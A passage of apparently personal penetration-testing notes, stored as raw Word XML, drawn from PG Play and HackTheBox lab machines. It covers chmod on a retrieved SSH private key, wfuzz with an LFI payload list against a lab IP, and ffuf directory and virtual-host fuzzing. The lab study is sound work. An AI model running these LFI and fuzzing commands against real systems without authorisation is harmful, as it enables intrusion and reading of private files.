        <w:t xml:space="preserve">Change ssh Private Key File Permissions</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001170">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1347"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nano id_rsa</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001171">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1347"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">chmod 600 id_rsa</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001172">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1347"/>
        </w:numPr>
        <w:ind w:left="2880" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Grants read and write permissions to the owner only</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001173">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1347"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If the private key is encrypted (as in the EvilBox-One PG Play), then go to the SSH section of this document to learn how to decrypt SSH key. The section is called "Decrypting SSH Key"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001174">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1347"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If the private key doesn't work (like you can't access that directory), </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">then you can use LFI specific word lists to look for file paths that you can access</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. This is from the </w:t>
      </w:r>
      <w:hyperlink r:id="rId349">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Ha-natraj</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Play</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001175">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1347"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo wfuzz -c -w /usr/share/wordlists/seclists/Discovery/Web-Content/LFI\ payloads.txt --hw 0 http://</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">192.168.167.80</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/console/file.php?</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">file</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">=FUZZ</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001176">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1347"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Change the parameter "file" to whatever your parameter is </w:t>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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Adding cookies:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000117C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1483"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ffuf -b "NAME1=VALUE1; NAME2=VALUE2" -w wordlist.txt -u </w:t>
      </w:r>
      <w:hyperlink r:id="rId350">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="ff0000"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://host.name/FUZZ</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000117D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1483"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">here, NAME and VALUE are the names and values of cookies </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000117E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1483"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ffuf -b "NAME1=VALUE1" -w wordlist.txt -u </w:t>
      </w:r>
      <w:hyperlink r:id="rId351">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="ff0000"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://host.name/FUZZ</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000117F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1483"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you only need one cookie</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001180">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001181">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="258"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Cronos HTB</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, I got past an Admin login page. But even without the cookie, I was able to ffuf and look at the directories and files. At least in this case, the cookie wasn't necessary for ffuf. </w:t>
      </w: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pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_v78lk212ch8a" w:id="145"/>
      <w:bookmarkEnd w:id="145"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Subdomain/virtual host fuzzing (finding subdomains):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001186">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">OBSERVE:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In BoardLight HTB, we learned that once you find an email on the website, you have a domain (ex. board.htb). And then you can assume that is a domain and then add it to /etc/hosts and then do subdomain traversal. The cool thing is that it doesn't matter if you misspell board.htb.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Therefore, even if we don't know any domain, we can make one up and then subdomain traversal still works if it exists. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001187">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="253"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">HOWEVER, once you find the subdomain and add it to /etc/hosts, you need to know the correct domain. Like you can't append the wrong domain to the subdomain in /etc/hosts</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001188">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001189">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_yhl5szp89ese" w:id="146"/>
      <w:bookmarkEnd w:id="146"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For virtual hosting (which is most cases, cuz we have a target IP):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000118A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">One example seen in </w:t>
      </w:r>
      <w:hyperlink r:id="rId352">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Scrutiny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18B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="956"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ffuf -H "Host: FUZZ.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">onlyrands.com</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" -H "User-Agent: PENTEST" -c -w "/usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt"-u http://</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">onlyrands.com</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000118C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="956"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Replace "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">onlyrands.com</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" with your domain</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000118D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="956"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And keep PENTEST since it's just random value</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000118E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ffuf -u http://example.com</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> -H "Host: FUZZ.example.com"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001191">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001192">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ffuf -u http://example.com</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> -H "Host: FUZZ.example.com"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> -w /usr/share/wordlists/SecLists/Discovery/DNS/bitquark-subdomains-top100000.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001193">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="472"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Different wordlist</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001194">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="472"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You NEED to include the Host and include the FUZZ keyword there instead of the URL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001195">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001196">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Once you find a subdomain, to access it, add it to /etc/hosts, so that the original IP points to both the main domain (virtual host) and the main domain with the subdomain</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001197">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="254"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo nano /etc/hosts</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001198">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="254"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">10.10.10.10 sub.example.com</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001199">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5337203" cy="3713987"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="195" name="image208.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image208.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId353"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5337203" cy="3713987"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000119A">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">URL path enumeration on subdomain:</w:t>
      </w:r>
    </w:p>
